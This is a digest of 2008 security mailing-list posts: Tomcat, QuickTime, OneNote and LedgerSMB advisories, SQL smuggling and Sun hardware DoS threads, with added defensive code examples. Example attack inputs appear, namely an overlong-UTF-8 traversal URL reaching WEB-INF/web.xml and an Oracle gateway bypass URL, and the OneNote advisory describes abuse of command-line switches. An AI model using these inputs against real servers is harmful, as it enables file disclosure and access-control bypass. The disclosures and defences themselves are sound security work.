[SECURITY] CVE-2008-2938 - Apache Tomcat information disclosure vulnerability - Updated

2008-09-10 Thread Mark Thomas
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CVE-2008-2938: Apache Tomcat information disclosure vulnerability - Updated

Severity: Important (was moderate)

Vendor:
The Apache Software Foundation

Versions Affected:
Tomcat 4.1.0 to 4.1.37
Tomcat 5.5.0 to 5.5.26
Tomcat 6.0.0 to 6.0.16
The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may also be affected

Description (new information):
Further investigation of CVE-2008-2938 has shown that the vulnerability
also exists only with URIEncoding="UTF-8" set on the connector. In these
configurations arbitrary files in the docBase for an application,
including files such as web.xml, may be disclosed.
Users should also be aware that this vulnerability will apply when
processing requests with UTF-8 body encoding and
useBodyEncodingForURI="true".

Mitigation:
6.0.x users should upgrade to 6.0.18
5.5.x users should upgrade to 5.5.27
4.1.x users should obtain the latest source from svn or apply this patch:
http://svn.apache.org/viewvc?view=rev&revision=681065

Example:
http://www.target.com/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml

Credit:
This additional information was discovered by the Apache Tomcat security
team.

References:
http://tomcat.apache.org/security.html

Mark Thomas


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkjHnCMACgkQb7IeiTPGAkMoLQCg2PxS09CpZGI9t+QcdifSfMh8
CHcAoOSRAPOzAFH5hx1w8jxOBthrAKEJ
=Fi0E
-----END PGP SIGNATURE-----
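An added illustration of the check a connector or front-end filter needs for the class of bug above: my code, not Tomcat's. It percent-decodes the path once, decodes the bytes with a strict UTF-8 decoder, and only then normalises and applies the access rules. Python's codec rejects overlong forms, so the %c0%ae%c0%ae in the advisory's example fails at decoding instead of becoming ".." on the file system. The protected-segment list and its case-insensitive match are my assumptions for the illustration, not a quote of Tomcat's implementation.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Directory names that must never be served to a client. Matching them
# case-insensitively is an assumption for this illustration, not a quote
# of Tomcat's own code.
PROTECTED_SEGMENTS = {"WEB-INF", "META-INF"}


def decode_path_strict(raw_path: str) -> str:
    """Percent-decode a request path and decode the bytes as strict UTF-8.

    A strict decoder rejects overlong forms: %c0%ae is a two-byte
    encoding of '.' that a lenient decoder may accept, so the
    '%c0%ae%c0%ae' from the advisory's example URL fails here instead
    of being resolved as '..' against the docBase.
    """
    try:
        return unquote_to_bytes(raw_path).decode("utf-8", errors="strict")
    except UnicodeDecodeError as exc:
        raise ValueError(f"invalid or overlong UTF-8 in path: {exc.reason}") from None


def check_request_path(raw_path: str) -> tuple:
    """Return (allowed, reason_or_normalised_path).

    Order matters: decode once, then normalise, then apply the access
    rules to the normalised form. Checking the raw percent-encoded
    string would miss every alternative encoding of the same characters.
    """
    try:
        decoded = decode_path_strict(raw_path)
    except ValueError as exc:
        return False, str(exc)
    if "\x00" in decoded:
        return False, "NUL byte in path"
    segments = [s for s in decoded.split("/") if s]
    if ".." in segments:
        # Reject rather than resolve: a traversal attempt is not a valid request.
        return False, "parent-directory segment after decoding"
    normalised = posixpath.normpath("/" + "/".join(segments))
    for segment in normalised.split("/"):
        if segment.upper() in PROTECTED_SEGMENTS:
            return False, f"{segment} is not served directly"
    return True, normalised


if __name__ == "__main__":
    for path in ("/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml",
                 "/contextpath/%2e%2e/WEB-INF/web.xml",
                 "/contextpath/caf%c3%a9/index.html"):
        print(path, "->", check_request_path(path))
```

The important property is that every rule runs on the same representation the file system will eventually see; a filter that looks for "../" in the raw request string has no opinion about "%c0%ae%c0%ae/" and lets it through.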


DeepSec 2008 - Conference Schedule

2008-09-10 Thread DeepSec Conference Vienna
The DeepSec In Depth Security Conference is happy to announce the preliminary
schedule for this year's event from November 11th to 14th in Vienna, Austria.

The schedule, which can be found at https://deepsec.net/schedule, offers bleeding
edge talks from international speakers on topics including botnet analysis, web
application security, malware detection, legal and administrative issues, secure
coding and code review, hardware and firmware attacks, and more.

Registration is open at: https://deepsec.net/register/

In addition to the two day conference we offer two days of in-depth workshops on
selected topics:

‣ Improving Code with Destructive Data (Heikki Kortti and Jukka Taimisto)
‣ Security Audit and Hardening of Java based Software (Marc Schoenefeld)
‣ The Exploit Laboratory (Saumil Udayan Shah)
‣ Design and Implementation of Security Awareness Campaigns (Stefan Schumacher)
‣ Advanced Malware Deobfuscation (Scott Lambert)
‣ Protocol and Traffic Analysis for Snort Signature (Matt Jonkman)
‣ Secure Application Coding for Enterprise Software (Vimal Patel)

List of speakers with presentations:

‣ Achim Reckeweg ; Sun Microsystems ; Germany
‣ Alex Stamos ; iSEC Partners ; USA
‣ Alexander Kornbrust ; Red Database Security GmbH ; Germany
‣ Andrea Monti ; Studio Legale Monti ; Italy
‣ Arrigo Triulzi ; Independent Security Consultant ; Italy
‣ Chema Alonso, José Parada ; Informática 64 ; Spain
‣ Daniel Mende, Simon Rich ; ERNW GmbH ; Germany
‣ Dr. Anton Chuvakin ; LogLogic, Inc ; USA
‣ Haroon Meer ; SensePost ; South Africa
‣ Heikki Kortti and Jukka Taimisto ; Codenomicon Ltd ; Finland
‣ Jason Steer ; IronPort, a division of Cisco Systems ; UK
‣ Joe Stewart ; SecureWorks ; USA
‣ José Nazario ; Arbor Networks ; USA
‣ Kurt Grutzmacher ; Pacific Gas & Electric ; USA
‣ Luciano Bello ; CITEFA/Si6 , Debian Project ; Argentina
‣ Marc Schoenefeld ; University of Bamberg ; Germany
‣ Matt Jonkman ; Emerging Threats.net (formerly bleedingthreats.net) ; USA
‣ Morgan Marquis-Boire ; Security-Assessment.com ; New Zealand
‣ Neelay S. Shah ; Foundstone Inc., A Division of McAfee ; USA
‣ Paolo Perego ; Spike Reply srl, Owasp Orizon Project leader ; Italy
‣ Peter Panholzer ; SEC Consult Unternehmensberatung GmbH ; Austria
‣ Rafael Dominguez Vega ; MWR InfoSecurity ; UK
‣ Saumil Udayan Shah ; CEO, Net-Square ; India
‣ Scott Lambert, Jason Geffner ; Microsoft, NGSSoftware Ltd. ; USA
‣ Sharon Conheady ; Ernst & Young ; UK
‣ Shreeraj Shah ; Blueinfy Solutions ; India
‣ Simon Roses Femerling ; Microsoft ; Spain
‣ Stefan Schumacher ; Kaishakunin.com ; Germany
‣ Stefano Zanero ; Politecnico di Milano TU
‣ Claudio Criscione ; SecureNetwork Srl ; Italy
‣ VimalPatel ; Founder & Director, Blueinfy Solutions Pvt. Ltd. ; India
‣ Vincenzo Iozzo ; Secure Network ; Italy
‣ Yarochkin Fedor/Meder Kydyraliev ; guard-info ; Kyrgyzstan
‣ Yiannis Pavlosoglou ; Ounce Labs / PhD, OWASP Project Leader ; United Kingdom
‣ fukami ; SektionEins GmbH ; Germany


DeepSec Organisation Team.
https://deepsec.net/contact



Re: SQL Smuggling

2008-09-10 Thread Marco Ivaldi

Avi,

On Tue, 9 Sep 2008, [EMAIL PROTECTED] wrote:

[snip]

Of course, I'm looking forward to hearing about other instances of 
this...


Interesting research.

It looks like Oracle DBMS may be vulnerable to the "Unicode Smuggling"
attack exploiting homoglyphic translation. As outlined by David Litchfield
in an old full-disclosure post [1]:

"It didn't take long to discover that this patch could be bypassed using
the following technique: due to internationalization, an Oracle database
server will convert the ÿ character (value 0xFF) to a capital Y. The PLSQL
Gateway will not. Thus, if we request:

http://www.example.com/pls/dad/S%FFS.PACKAGE.PROCEDURE

the gateway will happily pass it over to the database server where the ÿ
is converted to a Y and we can gain access again".


Cheers,

[1]. See http://seclists.org/fulldisclosure/2006/Feb/0011.html

--
Marco Ivaldi, OPST
Red Team Coordinator      Data Security Division
@ Mediaservice.net Srl    http://mediaservice.net/
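An added example, written for this digest and not part of Marco's post or of Litchfield's, of the defensive principle behind the quoted bypass: a front-end filter must canonicalise a name the same way the backend will before deciding on it. The model of the database's conversion (decode as ISO-8859-1, fold ÿ to Y, upper-case) is an assumption taken from the description above, not Oracle's real character-set tables; the blocked schema list is likewise mine.

```python
from urllib.parse import unquote_to_bytes

# Toy model of the translation the quoted post describes: the database
# decodes the name in a single-byte charset, folds ÿ (0xFF) to 'Y' and
# upper-cases identifiers. The mapping is an assumption for this
# illustration, not Oracle's real character-set behaviour.
DB_CHARSET = "iso-8859-1"
DB_FOLDING = {"\u00ff": "Y"}
BLOCKED_SCHEMAS = {"SYS"}


def db_canonical_name(raw: bytes) -> str:
    """The identifier as the backend will see it after its own conversions."""
    text = raw.decode(DB_CHARSET)
    text = "".join(DB_FOLDING.get(ch, ch) for ch in text)
    return text.upper()


def naive_gateway_allows(raw: bytes) -> bool:
    """Filter that inspects the bytes exactly as received."""
    schema = raw.split(b".", 1)[0].upper()  # bytes.upper() folds ASCII only
    return schema.decode(DB_CHARSET) not in BLOCKED_SCHEMAS


def canonical_gateway_allows(raw: bytes) -> bool:
    """Filter that canonicalises the way the backend does, then decides."""
    schema = db_canonical_name(raw).split(".", 1)[0]
    return schema not in BLOCKED_SCHEMAS


def evaluate(url_path: str) -> dict:
    """Compare both filters on the last path segment of a gateway URL."""
    raw = unquote_to_bytes(url_path.rsplit("/", 1)[-1])
    return {
        "backend_sees": db_canonical_name(raw),
        "naive_allows": naive_gateway_allows(raw),
        "canonical_allows": canonical_gateway_allows(raw),
    }


if __name__ == "__main__":
    for path in ("/pls/dad/S%FFS.PACKAGE.PROCEDURE", "/pls/dad/APP.PKG.PROC"):
        print(path, evaluate(path))
```

The naive filter and the backend disagree about what the request names, which is the whole attack surface; the canonicalising filter removes the disagreement rather than enumerating bypasses.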



RE: Sun M-class hardware denial of service

2008-09-10 Thread Michael Wojcik
> From: Theo de Raadt [mailto:[EMAIL PROTECTED] 
> Sent: Tuesday, 09 September, 2008 17:28
> To: B 650
> Cc: bugtraq@securityfocus.com
> 
> > I apologise if I'm misunderstanding you, but it seems to me that this
> > issue can only be initiated by a privileged user on a domain.
> 
> If one domain can be broken into, and a Solaris kernel module 
> is loaded which then crashes that one domain, the entire 
> machine eventually has to be powered off to recover that one domain.

I agree with Theo. This is a privilege-escalation DOS attack, pure and
simple. A user with sufficient privilege in one domain, but not
necessarily in others, can 1) force that domain down for an extended
time, and/or 2) force all domains down.

"Privilege" isn't an absolute; there are degrees of privilege, and this
bug lets a user do more damage than their degree of privilege should
allow.

-- 
Michael Wojcik
Principal Software Systems Developer, Micro Focus


Re: Chrome(0.2.149.27) title(not the tag) Denial of Service(Freeze) exploit

2008-09-10 Thread Julien Stuby

Razi Shaban wrote:

> I can confirm that the PoC _does_ crash Chrome 0.2.149.29 Build 1798
> running on XP SP2.
>
> Perhaps it's the build?
>
> --
> Razi


I can confirm that the PoC _doesn't_ crash Chrome 0.2.149.29 Build 1798 
on XP SP3


--
Julien


Re: Sun M-class hardware denial of service

2008-09-10 Thread Micheal Patterson



- Original Message -
From: "Theo de Raadt" <[EMAIL PROTECTED]>
To: "B 650" <[EMAIL PROTECTED]>
Cc:
Sent: Tuesday, September 09, 2008 4:27 PM
Subject: Re: Sun M-class hardware denial of service

> > You stated in your original message that this is a high-end frame, of
> > the kind generally used by financial institutions etc.  I would
> > imagine any system which warrants this kind of hardware would have
> > some level of redundancy or DR.
>
> Oh great!  Sun is off the hook for selling something which doesn't
> work, and their customers must mitigate against it themselves.
> Utterly ridiculous.


B 650, the major problem with that statement is that most facilities
that have built up redundancy for such an issue have 100% or more backup
of the exact same gear. That means that their DR plan is still crippled
and subject to the exact same failure as the primary system. That isn't
an effective DR plan.

If the system were in place at, say, a nuclear power plant, and it was
sold as a method to have separation to eliminate any problems with one
system causing another to cascade crash, and this happens, that affects
many other systems. Regardless of whether the initiator of the failure is a
power user or not, the result is a total cascade failure and will result
in a full system shutdown to recover from. It's still, by definition, a
DOS, simply because the actions of one individual, either by accident or
malice, result in the denial of access to a system or group of systems.
If you're one of the domains that will be affected, and you're taken
down even though your network / system is stable and working properly,
that would be seen as an unnecessary outage. What happens if the system
doesn't boot back up properly after the power down? Now the outage is
extended and perhaps critical systems are no longer available. I used a
nuclear power plant as an example; what if it were an airport, or a
city's 911 / Emergency service? Fire Department dispatch system? EMS
system? Do you still think that it's a non-issue to take down an entire
system for one faulty domain?


--

Micheal Patterson
Senior Communications Systems Engineer
Rural Hospital Acquisition, LLC
405-917-0600

Confidentiality Notice:  This e-mail message, including any attachments,
is for the sole use of the intended recipient(s) and may contain
confidential and privileged information. Any unauthorized review, use,
disclosure or distribution is prohibited. If you are not the intended
recipient, please contact the sender by reply e-mail and destroy all
copies of the original message. 



ZDI-08-061: Apple QuickTime Player H.264 Parsing Heap Corruption Vulnerability

2008-09-10 Thread zdi-disclosures
ZDI-08-061: Apple QuickTime Player H.264 Parsing Heap Corruption 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-061
September 9, 2008

-- CVE ID:
CVE-2008-3627

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists in the parsing of MP4 video files in
QuickTimeH264.qtx. A maliciously crafted MDAT atom can cause a heap
corruption resulting in the execution of arbitrary code. 

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-05-13 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 


ZDI-08-062: Apple QuickTime MDAT Frame Parsing Memory Corruption Vulnerability

2008-09-10 Thread zdi-disclosures
ZDI-08-062: Apple QuickTime MDAT Frame Parsing Memory Corruption 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-062
September 9, 2008

-- CVE ID:
CVE-2008-3627

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists in the parsing of mov video files in
QuickTimeH264.scalar. A maliciously crafted MDAT atom can cause a heap
corruption resulting in the execution of arbitrary code under the
context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-05-19 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Subreption LLC



Re: Sun M-class hardware denial of service

2008-09-10 Thread Bob Beck
> 
> Yet you don't know what it is that causes the issue?  What's Sun's
> support arrangement for OpenBSD on SPARC?  If it is reproduced in
> Solaris, then I'm sure Sun would address it, but where is the benefit
> for them to do so at present?

It's not about OpenBSD on sparc - the OpenBSD people don't
really care - the fact that it's possible at all means anyone with
clue and a less than black hat can go take an OpenBSD kernel, figure
out what it's doing there, and likely make a solaris kernel module
to do the same thing - then they have a nice little tool. This indicates
that something is broken, and can likely be taken advantage of.

Frankly, the OpenBSD people aren't going to bother doing it.
They're only interested in making OpenBSD go. I can think of several
people I've met in bars on the other hand who might be interested
in having a domain-instabrick module for solaris.

-Bob


Insomnia : ISVA-080910.1 - MS Office OneNote URL Handling Vulnerability

2008-09-10 Thread Brett Moore
__

 Insomnia Security Vulnerability Advisory: ISVA-080910.1
___

 Name: MS Office OneNote URL Handling Vulnerability
 Released: 10 September 2008
  
 Vendor Link: 
http://office.microsoft.com/onenote
  
 Affected Products:
MS Office Onenote 2007
MS Office 2003 and 2007 have vulnerable components
 
 Original Advisory: 
http://www.insomniasec.com/advisories/ISVA-080910.1.htm
 
 Researcher: 
Brett Moore, Insomnia Security
http://www.insomniasec.com
___

___

 Description
___

OneNote is included as part of Office 2007, and provides an easy
way to store, manage, and share information.

OneNote installs a URL Handler under the registry key 
  HKEY_CLASSES_ROOT\OneNote 

with an open command specified as 
  C:\PROGRA~1\MICROS~2\Office12\ONENOTE.EXE /hyperlink "%1"
  
Due to the URL Handler, OneNote can be started from Internet
Explorer through a URI reference of 
  onenote://onenotefile 

where onenotefile is a locally hosted file, or a file accessible
through a UNC/WebDAV share.

The instance of OneNote started will be executed through the 
IEUSER.EXE process running under the currently logged-in user.
 
OneNote is one of the few Microsoft installed applications that
does NOT PROMPT the user, before executing from the URL.

Through the use of command line switches passed to OneNote from 
a URL, we found two exploitation scenarios.

___

 Details
___

- File Transfer to Client -

OneNote accepts a command switch to specify the location of the
local cache directory. By specifying this switch on the URL, it is
possible to specify an arbitrary location on the client, which
will be used to cache the opened notebooks. 

If a notebook is loaded from a remote share, a local copy will be
created under the cache directory. When OneNote caches the notebook
it makes a local copy of any binary files that are embedded inside
the notebook.

This allows the placement of binary files in a 'semi arbitrary'
location that can then be used in conjunction with social engineering
emails, or other attacks that require the knowledge of the location
of a file.

There may also be other attack vectors through the placement of
specially named files within search paths.

- Theft of Users OneNote Notebooks -

OneNote accepts a command switch to specify the location of the
backup directory. 

It is possible to specify an SMB share location on a remote server,
which will be used to back up the notebooks. This results in copies
of all opened notebooks being sent to the remote share.

___

 Solution
___

Microsoft have released a security update to address this issue:
http://www.microsoft.com/technet/security/bulletin/ms08-055.mspx

___

 Legals
___

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.

___
 
Insomnia Security Vulnerability Advisory: ISVA-080910.1
___
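An added auditing example for the mechanism the advisory describes; it is my code, not Insomnia's or Microsoft's. It parses a constructed .reg-style export, picks out every scheme registered as a URL handler and reports the command a browser can launch for it, which is the inventory a defender wants when deciding which handlers need the prompt-before-launch treatment. The OneNote key and command are taken from the advisory above; the "URL Protocol" marker value is the standard Windows convention for scheme handlers, and the txtfile entry is constructed as a non-handler contrast.

```python
import re

# Constructed .reg-style export (not taken from a real machine). The OneNote
# key and command are from the advisory; "URL Protocol" is the standard
# marker value that makes a key a browser-launchable scheme handler.
SAMPLE_REG_EXPORT = r'''
[HKEY_CLASSES_ROOT\OneNote]
@="URL:OneNote Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\OneNote\shell\open\command]
@="C:\\PROGRA~1\\MICROS~2\\Office12\\ONENOTE.EXE /hyperlink \"%1\""

[HKEY_CLASSES_ROOT\txtfile]
@="Text Document"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="%SystemRoot%\\system32\\NOTEPAD.EXE %1"
'''

# Matches the scheme's root key and, optionally, its shell\open\command subkey.
KEY_RE = re.compile(r"^\[HKEY_CLASSES_ROOT\\([^\\\]]+)(\\shell\\open\\command)?\]$")


def _unescape(value: str) -> str:
    """Undo .reg string escaping: \\ -> \ and \" -> " ."""
    return re.sub(r'\\(["\\])', r"\1", value)


def parse_reg_export(text: str) -> dict:
    """Return {scheme: {"is_url_protocol": bool, "command": str | None}}."""
    handlers = {}
    current = None  # (entry dict, inside_command_subkey)
    for line in text.splitlines():
        line = line.strip()
        key = KEY_RE.match(line)
        if key:
            scheme, in_command = key.group(1), bool(key.group(2))
            entry = handlers.setdefault(scheme, {"is_url_protocol": False, "command": None})
            current = (entry, in_command)
            continue
        if current is None or not line:
            continue
        entry, in_command = current
        if not in_command and line.startswith('"URL Protocol"='):
            entry["is_url_protocol"] = True
        elif in_command and line.startswith('@="') and line.endswith('"'):
            entry["command"] = _unescape(line[3:-1])
    return handlers


def url_handlers_to_review(text: str) -> dict:
    """{scheme: launch command} for every scheme a browser can hand a URL to.

    Every command that carries %1 receives attacker-chosen text straight
    from a web page; each such handler needs to prompt and to validate
    what it does with that argument.
    """
    return {scheme: entry["command"]
            for scheme, entry in parse_reg_export(text).items()
            if entry["is_url_protocol"]}


if __name__ == "__main__":
    for scheme, command in url_handlers_to_review(SAMPLE_REG_EXPORT).items():
        print(f"{scheme}: {command}")
```

On a live system the same walk is done over HKEY_CLASSES_ROOT directly; the parser form is used here so the example runs offline on the constructed export.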




Re: SQL Smuggling

2008-09-10 Thread Tim
> We released a research paper a few months ago, regarding a sub-class
> of SQL Injection that has not received attention till now. The crux is
> that when it comes to SQLi, protection and detection do not typically
> take the architecture into account; this can allow smuggling attacks
> which are not blocked or discovered.
> 
> The paper can be found at:
> http://www.ComsecGlobal.com/framework/Upload/SQL_Smuggling.pdf 
> 
> From the paper:
> "This paper will present a new class of attack, called SQL Smuggling.
> ...


I don't see how this is a new class of attack.  You've merely outlined
some techniques to bypass broken data validation routines.  In SQL
injection, as with any injection vulnerability, the correct way to fix
it is to rely on the syntax of the language to encode data which may be
interpreted as /special/.  

Yes, this is database specific.  That's not new.  That's why you need to
rely on the database's routines for treating data as data and not as SQL
syntax.  This is what parameterized statements are for.  You rely on the
database driver or database server itself to correctly separate data
from syntax.  If this is still injectable, then it's a vulnerability in
that particular database, but still isn't a "new class of attack".

Relying on data validation alone will eventually land you in hot water.
You can't always reject last names such as "O'Leary" just because of the
apostrophe.  Correct encoding is the way to *fix* it, and data
validation should only be used to slow down the bad guy if you forgot to
encode something and to enforce business logic.  (Go back and read this
paragraph again.  It's the important one.)

As for attacks against signature validation... uh, don't even go there.
We all know that's a losing battle.  Just look at how bad AV has become.

In summary, your paper would be better presented as a collection of fun
SQL injection attacks against commonly broken data validation routines.

tim
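An added example of the point Tim makes about parameterised statements; it is my code, not from the paper or from any poster in this thread. It builds an in-memory sqlite3 table with constructed rows and runs the same lookup both by string concatenation and with a bound parameter, so the "O'Leary" case and a classic quote-breaking input can be compared side by side.

```python
import sqlite3

# Constructed sample rows; the apostrophe in O'Leary is the case Tim raises.
SAMPLE_CUSTOMERS = [("Alice", "Smith"), ("Brendan", "O'Leary"), ("Chen", "Wang")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (first TEXT, last TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?)", SAMPLE_CUSTOMERS)
    return conn


def find_by_last_unsafe(conn: sqlite3.Connection, last: str) -> list:
    """Data is pasted into the SQL text, so the driver cannot tell it from syntax."""
    sql = f"SELECT first, last FROM customers WHERE last = '{last}'"
    return conn.execute(sql).fetchall()


def find_by_last_safe(conn: sqlite3.Connection, last: str) -> list:
    """The value travels as a bound parameter; the driver never parses it as SQL."""
    return conn.execute(
        "SELECT first, last FROM customers WHERE last = ?", (last,)
    ).fetchall()


def compare(last: str) -> dict:
    """Run both lookups on a fresh database and report what each returns."""
    conn = make_db()
    try:
        unsafe = find_by_last_unsafe(conn, last)
    except sqlite3.OperationalError as exc:
        unsafe = f"error: {exc}"  # the legitimate apostrophe breaks the query
    safe = find_by_last_safe(conn, last)
    conn.close()
    return {"unsafe": unsafe, "safe": safe}


if __name__ == "__main__":
    for name in ("Smith", "O'Leary", "Smith' OR '1'='1"):
        print(repr(name), compare(name))
```

The apostrophe that turns the concatenated query into a syntax error is the same mechanism that lets the third input widen the WHERE clause; the parameterised form treats both as plain surnames, which is what "rely on the database's routines for treating data as data" means in practice.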


iDefense Security Advisory 09.09.08: Apple QuickTime PICT Integer Overflow Vulnerability

2008-09-10 Thread iDefense Labs
iDefense Security Advisory 09.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Sep 09, 2008

I. BACKGROUND

Quicktime is Apple's media player product, and is used to render video
and other media. The PICT file format was developed by Apple Inc. in
1984. PICT files can contain both object oriented images and bitmaps.
For more information visit the vendor's web site at the following URL.

http://www.apple.com/quicktime/

II. DESCRIPTION

Remote exploitation of an integer overflow in Apple Inc.'s QuickTime
could allow an attacker to execute arbitrary code in the security
context of the current user.

QuickTime is vulnerable to an integer overflow vulnerability when
handling malformed PICT files. This issue results in heap corruption
which can lead to arbitrary code execution.

III. ANALYSIS

Exploitation of this issue results in arbitrary code execution in the
security context of the current user. An attacker would need to host a
web page containing a malformed PICT file. Upon visiting the malicious
web page exploitation would occur. Alternatively a malicious PICT file
could be attached to an e-mail.

IV. DETECTION

Apple Inc.'s QuickTime versions 7.4.5 and 7.4 have been confirmed to be
vulnerable to this issue. Older versions are also suspected to be
vulnerable.

V. WORKAROUND

iDefense recommends disabling the QuickTime Plug-in and altering the
.pic and .pict file type associations within the registry. Disabling
the plug-in will prevent web browsers from utilizing QuickTime Player
to view associated media files. Removing the file type associations
within the registry will prevent QuickTime Player and Picture Viewer
from opening .pic and .pict files.

VI. VENDOR RESPONSE

Apple has released QuickTime 7.5.5 which resolves this issue. More
information is available via Apple's QuickTime Security Update page at
the URL shown below.

http://support.apple.com/kb/HT3027

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-3614 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/13/2008  Initial vendor notification
05/22/2008  Initial vendor response
09/09/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


Multiple Vulnerabilities: LedgerSMB < 1.2.15

2008-09-10 Thread Chris Travers
Multiple vulnerabilities:  LedgerSMB

Synopsis:  Two vulnerabilities announced in LedgerSMB for versions
prior to 1.2.15
Status:  Corrected in version 1.2.15 and later (vendor fix available).
Impact:  Resource exhaustion on server, arbitrary SQL command execution.
Other software affected:  SQL-Ledger, all versions, and likely related software

Two vulnerabilities have been recently discovered in LedgerSMB which
have been patched in version 1.2.15 and later.

Vulnerability 1:  Resource exhaustion
Problem:  The CGI scripts read the query string up to
$ENV{CONTENT_LENGTH}, allowing for unlimited data in POST operations
to any screen.  Authentication is not required and this can be used to
deny service not only to LedgerSMB but potentially to anything else
running on the server.  This was corrected in 1.2.15.

Credit for discovery:
Chris Murtagh

Vulnerability 2:  SQL Injection in AR/AP Transactions Report
A parameter was not properly validated prior to being included in the
SQL for generating this report.  It would have been possible to inject
arbitrary SQL into the query.  Authentication is required to exploit. This
was corrected in 1.2.15.

Credit for discovery:
Seneca Cunningham
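An added example of the bounded body read that closes the first vulnerability; it is my code, not LedgerSMB's patch, and it is written against a CGI/WSGI-style environment rather than LedgerSMB's Perl. The size cap is an assumption chosen for the illustration, and the environments fed to it are constructed in the block.

```python
import io

# Cap on the body a handler will accept. The value is an assumption for
# this illustration; LedgerSMB's own limit is not given in the advisory.
MAX_BODY_BYTES = 1 << 20


class BodyTooLarge(ValueError):
    """Declared request body exceeds the configured cap."""


def read_request_body(environ: dict, max_bytes: int = MAX_BODY_BYTES) -> bytes:
    """Read a CGI/WSGI POST body without trusting CONTENT_LENGTH.

    The header is validated and capped before any read happens, and the
    loop never asks the stream for more than the declared size, so a
    client can neither declare a huge length nor push more bytes than it
    declared to make the server buffer unbounded data.
    """
    raw_length = environ.get("CONTENT_LENGTH") or "0"
    try:
        declared = int(raw_length)
    except ValueError:
        raise ValueError(f"malformed CONTENT_LENGTH: {raw_length!r}") from None
    if declared < 0:
        raise ValueError("negative CONTENT_LENGTH")
    if declared > max_bytes:
        raise BodyTooLarge(f"declared {declared} bytes, limit is {max_bytes}")

    stream = environ["wsgi.input"]
    chunks, remaining = [], declared
    while remaining > 0:
        chunk = stream.read(min(64 * 1024, remaining))
        if not chunk:
            # Client disconnected or lied about the length: do not hand a
            # partial body to the application as if it were complete.
            raise ValueError("request body shorter than CONTENT_LENGTH")
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def make_environ(body: bytes, content_length) -> dict:
    """Constructed CGI-style environment for offline use."""
    return {"CONTENT_LENGTH": str(content_length), "wsgi.input": io.BytesIO(body)}


def try_read(body: bytes, content_length, max_bytes: int = MAX_BODY_BYTES) -> tuple:
    """Classify the outcome: ('ok', bytes), ('too_large', None) or ('invalid', reason)."""
    try:
        return ("ok", read_request_body(make_environ(body, content_length), max_bytes))
    except BodyTooLarge:
        return ("too_large", None)
    except ValueError as exc:
        return ("invalid", str(exc))


if __name__ == "__main__":
    print(try_read(b"a=1&b=2", 7))
    print(try_read(b"", 10**9))
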